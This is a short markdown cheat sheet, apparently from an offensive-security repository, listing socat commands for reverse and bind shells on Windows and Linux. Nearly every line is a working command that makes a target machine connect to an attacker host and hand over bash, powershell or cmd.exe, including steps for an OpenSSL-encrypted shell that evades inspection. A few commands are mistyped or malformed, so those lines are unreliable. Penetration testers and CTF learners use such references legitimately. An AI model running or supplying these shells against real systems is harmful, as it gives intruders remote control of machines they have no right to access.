killchain-compendium/reverse shells/docs/socat.md

1.5 KiB

socat cheat sheet

Reverse Shell

reverse shell listener

socat tcp-l:<port> - socat TCP-L:<PORT> file:`tty`,raw,echo=0

windows target

socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:powershell.exe,pipes

linux target

socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li",pty,stderr,sigint,setsid,sane

Bind Shell

generic connect

socat TCP:<TARGET-IP>:<TARGET-PORT> -

windows target listener

socat TCP-L:<PORT> EXEC:powershell.exe,pipes

linux target listener


## Connect from statically compiled socat to LHOST
Binary is inside this dir
```socat TCP:<ATTACKER-IP>:<ATTACKER-PORT> EXEC:"bash -li",pty,stderr,sigint,setsid,sane```

## Encrypted Shell
### create key + cert
```openssll req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt```

### create pem file
```cat shell.key shell.crt > shell.pem```

### reverse shell listener
```socat openssl-listen:<port>,cert=shell.pem,verify=0 -```
```socat openssl-listen:<port>,cert=shell.pem,verify=0 file:`tty`,raw,echo=0```

### connecting shell on target to listener
```socat openssl:<attacker-ip>:<attacker-port>,verify=0 exec:/bin/bash```
```socat openssl:<attacker-ip>:<attacker-port>,verify=0 exec:"bash -li",pty,stderr,sigint,setsid,sane```

### encrypted bind shell on windows listening
* target
```socat openssl-listen:<local-ip>:<local-port>,verify=0 exec:cmd.exe,pipes```

### encrypted bind shell attacker connecting
```socat openssl:<port>,cert=shell.pem,verify=0 -```